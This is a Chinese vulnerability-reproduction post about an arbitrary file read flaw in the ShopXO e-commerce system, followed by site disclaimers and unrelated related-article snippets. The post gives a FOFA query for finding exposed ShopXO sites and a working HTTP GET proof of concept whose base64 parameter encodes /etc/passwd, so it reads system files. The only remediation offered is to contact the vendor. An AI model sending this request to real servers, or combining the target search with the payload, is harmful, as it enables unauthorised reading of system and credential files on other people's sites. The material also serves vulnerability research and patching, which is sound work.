【漏洞复现】ShopXO任意文件读取漏洞

Nx01 产品简介

        ShopXO是一套开源的企业级开源电子商务系统,包含PC、H5、微信小程序、支付宝小程序、百度小程序等多个终端,遵循Apache2开源协议发布,基于ThinkPHP5.1框架研发。该系统具有求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案等特点,可满足99%的电商运营需求。

Nx02 漏洞描述

        ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: app="ShopXO企业级B2C电商系统提供商"

Nx04 漏洞复现

POC:

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Nx05 修复建议

建议联系软件厂商进行处理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/508986.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

rust多个mod文件引用和文件夹mod使用注意事项

如果mod文件都在同一级目录,则直接使用就可以,因为rust文件都是一个隐藏的mod,但是如果mod文件在另外一个目录下面,就需要在目录下面声明一个mod.rs文件,这样才能将那个目录识别为一个mod,可以在mod.rs里面…

《教育信息化论坛》是什么级别的期刊?知网收录吗?能评职称吗?

问题解答: 问:《教育信息化论坛》是什么级别的刊物? 答:省级 主管单位:中原大地传媒股份有限公司 主办单位:河南电子音像出版社有限公司 文心出版社有限公司 问:《教育信息化论坛》是学术期刊吗? 答…

【EI会议征稿通知】2024云计算、性能计算与深度学习国际学术会议(CCPCDL 2024)

2024云计算、性能计算与深度学习国际学术会议(CCPCDL 2024) 2024 International conference on Cloud Computing, Performance Computing and Deep Learning 2024云计算、性能计算与深度学习国际学术会议(CCPCDL 2024)将于2024年6月21-23日在中国郑州举行。CCPCDL已成功召开…

深度学习预测分析API:金融领域的Game Changer

🚀 引言 在这个AI遍地开花的时代,谁能成为金融领域的真正Game Changer?那必然是是深度学习预测分析API。如大脑般高效运转的系统不仅颠覆了传统操作,更是以无与伦比的速度和精度赋予了金融数据以全新的生命。 💼 广泛…

HM2019使用循环对称进行网格变形操作

案例一:使用循环对称创建圆顶状的瓶底结构: 案例二:利用循环对称在瓶子底部创建类似于瓶子中部的凹槽结构:如图所示: 步骤如下: 步骤中注意点:

coze创建机器人并发布到discord

https://www.coze.com/ https://www.coze.com/docs/publish/discord.html https://discord.com/developers/applications 我开发的chatgpt网站: https://chat.xutongbao.top

STM32(11)按键产生中断

1.初始化IO引脚,设置模式,速度等 2.设置AFIO(配置EXTI的引脚映射),记得开启时钟 3.配置EXTI的通道(EXTI0和EXTI1) 4.配置NVIC 4.1 中断优先级分组 4.2 配置中断 5.编写中断响应函数 在中断向量…

C++ 类的大小 原理+详细计算示例

大小的组成 类的大小受:基类,成员,虚基表指针,虚函数表指针 影响。 计算方式 需要按照下列要素对齐和规则计算对齐: 对齐要素 编译器默认对齐数 根据环境改变,一般32位为4,64位为8。 有效…

linux逻辑卷管理

一.物理卷,逻辑卷,卷组的关系 二.实验题目 1.业务需要,新增5G硬盘,先对第一块磁盘分区,大小为4G,现在进行逻辑卷划分,卷组名为myvg,逻辑卷名为LV1,大小为2G 2.格式化逻辑卷LV1&#…

web3时事粥报

比特币正成为更具有吸引力的通胀对冲工具 在通胀的宏观经济浪潮中,比特币正逐渐崭露头角,成为那些渴望多元化投资组合的投资者眼中的璀璨明星。Kooner 预测,2024年,各种宏观经济挑战可能进一步提升比特币、黄金和白银等资产的避险…

xsslabs第九关

沿用第八关的思路 显示我的链接并不合法 我们看一下部分源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv"content-type" content"text/html;charsetutf-8"> <script> window.alert function(…

Linux --- 应用层 | HTTP | HTTPS

前言 前面写的TCP/UDP客户端在访问服务端的时候&#xff0c;需要输入ip地址和端口号才可以访问&#xff0c; 但在现实中&#xff0c;我们访问一个网站是直接输入的一个域名&#xff0c;而不是使用的ip地址端口号。 比如在访问百度 https://www.baidu.com/的时候&#xff0c; …